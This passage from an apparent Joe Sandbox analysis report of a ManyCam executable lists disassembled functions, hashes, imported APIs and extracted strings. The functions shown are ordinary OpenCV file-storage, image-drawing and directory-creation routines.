Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75b442f68bfa13ecf95745a6ad9ea2403c62a9ce67939bfd452bec87a3fa3eba
Instruction ID: c329bfb28bb63e886e0252339320dd77e6bced27848eb7f5f6e1f971febd3649
Opcode Fuzzy Hash: 75b442f68bfa13ecf95745a6ad9ea2403c62a9ce67939bfd452bec87a3fa3eba
Instruction Fuzzy Hash: D4517D729193218FC354DF29C48016BF7E2FFE8710F4A996DE8C497264E375A845CB92

Function 00BAA9D0 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaf2b9a549b14fdad3d1a05c717eb6425e8e5c213d95983a13903752aac0e146
Instruction ID: 70a508f75a229e00cd73ce85cdc11ba10485a02debfc3a7e69e4b31ab300cbf8
Opcode Fuzzy Hash: eaf2b9a549b14fdad3d1a05c717eb6425e8e5c213d95983a13903752aac0e146
Instruction Fuzzy Hash: 03416C726083018FC314DF79C98459BF3E3FFE8315F0A8A2DE88457254E772A94ACA52

Function 00BAA88E Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bfc069de3f4d1bf17a600c5135642ccfcfa6ed0d0e372313f0109e4aba14c94
Instruction ID: b88acc2d5cedc94a394cf13aa37663861ecffd59891b7e02020fa65e24e1c5be
Opcode Fuzzy Hash: 5bfc069de3f4d1bf17a600c5135642ccfcfa6ed0d0e372313f0109e4aba14c94
Instruction Fuzzy Hash: 98318F739193218BC354DF35C4801ABF3E2FFE4325F4B9969E8C4972A4E2769841C792

Function 00C2A820 Relevance: 116.0, APIs: 50, Strings: 16, Instructions: 490
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

cvError.GLU32(000000E5,cvOpenFileStorage,NULL filename,.\cxpersistence.cpp,00000A59,?,00000000,00000000,?,?,?,?,?,00C2CBEF,?,?), ref: 00C2A863

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvAlloc.GLU32(000000FC,?,00000000,00000000,?,?,?,?,?,00C2CBEF,?,?,00000000), ref: 00C2A875
cvGetErrStatus.GLU32(?,?,?,?,?,00C2CBEF,?,?,00000000), ref: 00C2A883
cvError.GLU32(000000FF,cvOpenFileStorage,Inner function failed.,.\cxpersistence.cpp,00000AD9), ref: 00C2ADD7
cvGetErrStatus.GLU32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C2CBEF,?,?), ref: 00C2AE27
fclose.MSVCR80 ref: 00C2AE40
cvFree_.GLU32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C2CBEF,?), ref: 00C2AE65

Strings

...---, xrefs: 00C2ACB4
.XML, xrefs: 00C2A98C
%YAML:1.0, xrefs: 00C2ACA9
cvOpenFileStorage, xrefs: 00C2A85C, 00C2ABD0, 00C2ADD0
a+t, xrefs: 00C2A949, 00C2A951
, xrefs: 00C2AC16
.\cxpersistence.cpp, xrefs: 00C2A852, 00C2ABC6, 00C2ADC6
<opencv_storage>, xrefs: 00C2AC4C
.Xml, xrefs: 00C2A9A0
NULL filename, xrefs: 00C2A857
Could not find </opencv_storage> in the end of file., xrefs: 00C2ABCB
<?xml version="1.0"?>, xrefs: 00C2AC41
Inner function failed., xrefs: 00C2ADCB
</opencv_storage>, xrefs: 00C2AAAD
r+t, xrefs: 00C2ABF1
.xml, xrefs: 00C2A97A

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Status$Error$AllocFree_fclose
String ID: $%YAML:1.0$...---$.XML$.Xml$.\cxpersistence.cpp$.xml$</opencv_storage>$<?xml version="1.0"?>$<opencv_storage>$Could not find </opencv_storage> in the end of file.$Inner function failed.$NULL filename$a+t$cvOpenFileStorage$r+t
API String ID: 1767364728-4154119818
Opcode ID: 66318d672091433d429e59b318418d488c26dd9b64ce2fffbe96e805b072dadc
Instruction ID: 259769d59b9ce6ae0137873cbf0987890efe2df08432758790c29efbdbe05a22
Opcode Fuzzy Hash: 66318d672091433d429e59b318418d488c26dd9b64ce2fffbe96e805b072dadc
Instruction Fuzzy Hash: 7702E0B5A003589BDB24DF68EC41BAE37E5FF44304F084529FE199B780EB71D9848B92

Function 00419920 Relevance: 88.0, APIs: 45, Strings: 5, Instructions: 463
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1

Part of subcall function 00418B80: CreateSolidBrush.GDI32(744843B1), ref: 00418B8B

FillRect.USER32(00000000,?,00000000), ref: 004199CF
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000), ref: 00419A41
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000), ref: 00419A5D
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00419A8A
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00419AA9
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00419ABD
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00419AD9
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00419AFB
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00419B10
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00419B22
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419B34
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00419B58
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00419B7A
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00419B96
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00419BB8
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?), ref: 00419BE3
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00419BF8
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00419C14
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00419C28
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00419C3F
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00419C5D
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00419C7F
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00419C9E
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00419CC1
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?), ref: 00419CEE
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00419D0D
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00419D21
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00419D40
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00419D55
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00419D75
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00419D8A
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00419D9C
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419DAE
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00419DC5
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00419DE5
SetBkMode.GDI32(00000000,00000001), ref: 00419E09
GetTextColor.GDI32(00000000), ref: 00419E18
SetTextColor.GDI32(00000000,0096681D), ref: 00419E2C
memset.MSVCR80 ref: 00419ED8
SelectObject.GDI32(00000000,00000000), ref: 00419F18
memset.MSVCR80 ref: 00419F6A
memset.MSVCR80 ref: 00419FB1

Strings

Clip Line, xrefs: 00419F21
%, xrefs: 00419FC0
Border, xrefs: 00419F72
Tahoma, xrefs: 00419E9C
F, xrefs: 00419FD0

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Image@@$Height@Width@$C__@@Draw@T@@_Utag$memset$ColorRectText$BrushClientCreateFillModeObjectSelectSolid
String ID: %$Border$Clip Line$F$Tahoma
API String ID: 2569125150-2632024743
Opcode ID: fbd3d37cbcfb4a5d345145a4449552b179033964231fac46975376ef3b4c5788
Instruction ID: 6acad93585106d0d29ca26f9a2d8656a706cc7dc15e340c93166a7cfeebd7e9c
Opcode Fuzzy Hash: fbd3d37cbcfb4a5d345145a4449552b179033964231fac46975376ef3b4c5788
Instruction Fuzzy Hash: 5F226E709041199FEF18EB68CCA9BEEB7B8FF54304F1441ADE10AA7291DB742A85CF54

Function 00C26910 Relevance: 72.1, APIs: 20, Strings: 21, Instructions: 349stringCOMMON

Download Yara Rule

APIs

cvGetFileNodeByName.GLU32 ref: 00C26944

Part of subcall function 00C22FC0: cvError.GLU32(000000E5,cvGetFileNodeByName,Null element name,.\cxpersistence.cpp,0000023E), ref: 00C2300D

cvGetErrStatus.GLU32 ref: 00C2695D
cvError.GLU32(000000FF,icvReadSeq,Inner function failed.,.\cxpersistence.cpp,000010A5), ref: 00C2697C
cvGetFileNodeByName.GLU32(?,?,00C5CBB8,?,?,count,000000FF), ref: 00C269AE
strtol.MSVCR80 ref: 00C269F6
cvGetFileNodeByName.GLU32(?,?,header_user_data,?,?,header_dt,00000000), ref: 00C26A38
cvGetFileNodeByName.GLU32(?,?,rect), ref: 00C26A71

Part of subcall function 00C22FC0: cvGetSeqElem.GLU32(?,?), ref: 00C2308D

cvGetFileNodeByName.GLU32(?,?,origin,?,?,rect), ref: 00C26A7F
cvGetErrStatus.GLU32 ref: 00C26ACC
cvError.GLU32(000000FE,icvReadSeq,Some of essential sequence attributes are absent,.\cxpersistence.cpp,000010AA), ref: 00C26D34

Strings

Only one of "header_user_data", "rect" and "origin" tags may occur, xrefs: 00C26AAC
8, xrefs: 00C26934
origin, xrefs: 00C26A76
header_user_data, xrefs: 00C26A2B
flags, xrefs: 00C26927
The sequence flags are invalid, xrefs: 00C26D17
.\cxpersistence.cpp, xrefs: 00C2696B, 00C26A5B, 00C26AA7, 00C26ADA, 00C26C7D, 00C26CA7, 00C26D12, 00C26D23
data, xrefs: 00C26C63
header_dt, xrefs: 00C26A1F
The image data is not found in file storage, xrefs: 00C26C82
icvReadSeq, xrefs: 00C26975, 00C26AE4, 00C26D2D
The number of stored elements does not match to "count", xrefs: 00C26CAC
Some of essential sequence attributes are absent, xrefs: 00C26D28
@, xrefs: 00C26B02
color, xrefs: 00C26BCC
height, xrefs: 00C26BB8
Inner function failed., xrefs: 00C26970, 00C26ADF
width, xrefs: 00C26BA7
One of "header_dt" and "header_user_data" is there, while the other is not, xrefs: 00C26A60
count, xrefs: 00C26995
rect, xrefs: 00C26A6A

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: FileNameNode$Error$Status$Elemstrtol
String ID: .\cxpersistence.cpp$8$@$Inner function failed.$One of "header_dt" and "header_user_data" is there, while the other is not$Only one of "header_user_data", "rect" and "origin" tags may occur$Some of essential sequence attributes are absent$The image data is not found in file storage$The number of stored elements does not match to "count"$The sequence flags are invalid$color$count$data$flags$header_dt$header_user_data$height$icvReadSeq$origin$rect$width
API String ID: 3237562507-1289061060
Opcode ID: 6d6da4270d842493ee4440a6d0b7e8c6343bc75b26ac2ce6533b7c843537993d
Instruction ID: 19fdacdabb65b723ae7d8161af91198283bb93fca67ad840a2244967d52509f9
Opcode Fuzzy Hash: 6d6da4270d842493ee4440a6d0b7e8c6343bc75b26ac2ce6533b7c843537993d
Instruction Fuzzy Hash: F1B137347403606FD310AE64EC83F6B7298EF80714F10497DFD55A76C2EAB4E98496AA

Function 00512040 Relevance: 67.0, APIs: 29, Strings: 9, Instructions: 499memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB139
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB155
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB171
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1A3
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1D6

Part of subcall function 004CB5F0: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 004CB626
Part of subcall function 004CB5F0: _wmkdir.MSVCR80 ref: 004CB633

Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA

CreateDirectoryW.KERNEL32(00000000,00000000,?,?,?,00000001,\ManyCam,00000000,00569E94,?,00569E90,?,00569E8C,?,00000000,00000000), ref: 0051221A
_DebugHeapAllocator.LIBCPMTD ref: 0051222B

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

_DebugHeapAllocator.LIBCPMTD ref: 00512251

Part of subcall function 004167E0: _DebugHeapAllocator.LIBCPMTD ref: 004167EE

Part of subcall function 004CC140: wcscpy_s.MSVCR80 ref: 004CC168
Part of subcall function 004CC140: SHFileOperationW.SHELL32(00000000), ref: 004CC1BD

CreateDirectoryW.KERNEL32(00000000,00000000,?,?,NewEffect,00569EAC,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,744843B1), ref: 00512270
CreateDirectoryW.KERNEL32(00000000,?,?,?,?,00569ED4,640x480,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002), ref: 005122D0
CreateDirectoryW.KERNEL32(00000000,?,?,?,?,00569EE8,352x288,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002), ref: 0051234A
??0CxImage@@QAE@K@Z.CXIMAGECRT(00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,744843B1), ref: 00512372
?SetFrame@CxImage@@QAEXJ@Z.CXIMAGECRT(00000000,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,744843B1), ref: 00512383
?SetRetreiveAllFrames@CxImage@@QAEX_N@Z.CXIMAGECRT(00000001,00000000,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,744843B1), ref: 00512390
?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,00000001,00000000,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,744843B1), ref: 005123A6
~_Mpunct.LIBCPMTD ref: 005123C8

Part of subcall function 004166C0: ?DestroyFrames@CxImage@@QAE_NXZ.CXIMAGECRT(?,?,0050679A,You have selected an image with the dimension larger than 3000x2000.,00000000,00000000), ref: 004166D3
Part of subcall function 004166C0: ?Destroy@CxImage@@QAE_NXZ.CXIMAGECRT(?,?,0050679A,You have selected an image with the dimension larger than 3000x2000.,00000000,00000000), ref: 004166DB

?GetNumFrames@CxImage@@QBEJXZ.CXIMAGECRT(00000000,00000000,00000001,00000000,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,744843B1), ref: 005123F6
?GetNumFrames@CxImage@@QBEJXZ.CXIMAGECRT(?,?,?,?,00569F04,preview.jpg,00000000,00000000,00000001,00000000,00000000,?,00569E90,?,00569E8C), ref: 00512474
?SetFrame@CxImage@@QAEXJ@Z.CXIMAGECRT(00000000,00000000,00000002,744843B1), ref: 005124F5
?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,00000000,00000000,00000002,744843B1), ref: 0051250B
?GetFrameDelay@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000002,744843B1), ref: 00512516
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(?,?,?,00000000,?,?,?,?,?,00569F04,preview.jpg,00000000,00000000,00000001,00000000,00000000), ref: 005125AD
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,?,?,00000000,?,?,?,?,?,00569F04,preview.jpg,00000000,00000000,00000001,00000000), ref: 005125B6

Strings

.mce, xrefs: 005127C2
preview.jpg, xrefs: 00512412
640x480, xrefs: 00512278
InternalProperties, xrefs: 00512657
NewEffect, xrefs: 00512230
352x288, xrefs: 005122F2
preview.jpg, xrefs: 005126EC
blocked=0type_id=%dcategory_name=%screator_info=preview=%s, xrefs: 005126FA
\ManyCam, xrefs: 005121C1

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Image@@$AllocatorDebugHeap$CreateDirectoryFrames@$Frame@Load@$Delay@DestroyDestroy@FileFolderFrameHeight@MpunctOperationPathRetreiveSpecialWidth@_wmkdirwcscpy_s
String ID: .mce$352x288$640x480$InternalProperties$NewEffect$\ManyCam$blocked=0type_id=%dcategory_name=%screator_info=preview=%s$preview.jpg$preview.jpg
API String ID: 2719232945-3254136489
Opcode ID: edb56aa18bfe84e8b2a6fcb1c4672e86fafff6400bd075d5d8bb305b2034b014
Instruction ID: 9b3459efdfe137e0bd21340dd663e66a4f958181f4942486322fc66185ab85f6
Opcode Fuzzy Hash: edb56aa18bfe84e8b2a6fcb1c4672e86fafff6400bd075d5d8bb305b2034b014
Instruction Fuzzy Hash: D43219B19002599BDB24EB65CC95BEEBBB8BF44304F0041EDE509A7282DB746F84CF95

Function 00409060 Relevance: 54.7, APIs: 22, Strings: 9, Instructions: 435COMMON

Download Yara Rule

APIs

Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1

Part of subcall function 00418B80: CreateSolidBrush.GDI32(744843B1), ref: 00418B8B

FillRect.USER32(00000000,?,00000000), ref: 0040910F
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000), ref: 00409152
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040917C
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409191
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004091BC
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004091DB
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(000000E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409212
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,00000006,00000006,00000000,000000E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409231
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(000000E8,00000000,00000000,00000000,00000006,00000006,00000000,000000E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040924D
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000006,?,000000E8,00000000,00000000,00000000,00000006,00000006,00000000,000000E8,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409269
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,-00000006,00000006,?,000000E8,00000000,00000000,00000000,00000006,00000006,00000000,000000E8,00000000,00000000,00000000,00000000), ref: 00409287
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(000000E8,00000000,00000000,00000000,-00000006,00000006,?,000000E8,00000000,00000000,00000000,00000006,00000006,00000000,000000E8,00000000), ref: 004092A3
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,00000006,00000000,000000E8,00000000,00000000,00000000,-00000006,00000006,?,000000E8,00000000,00000000,00000000,00000006), ref: 004092C4
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,005952B0,00000000,00000000,00000000,?,00000006,00000000,000000E8,00000000,00000000,00000000,-00000006,00000006,?,000000E8), ref: 004092E7
memset.MSVCR80 ref: 00409647
SelectObject.GDI32(00000000,00000000), ref: 00409676
SetTextColor.GDI32(00000000,00945121), ref: 0040968D

Part of subcall function 00415F90: CopyRect.USER32(?,004093A8), ref: 00415F9F

DrawTextW.USER32(00000000,00000000,00000000,00000018,00000020), ref: 004096E4
SelectObject.GDI32(00000000,?), ref: 004096F9
GetWindowRect.USER32(00000000,?), ref: 0040971D
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(?,000000FF,000000FF,00000000,00000000,?), ref: 0040974D
?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,?,000000FF,000000FF,00000000,00000000,?), ref: 00409770

Strings

Type:, xrefs: 00409478
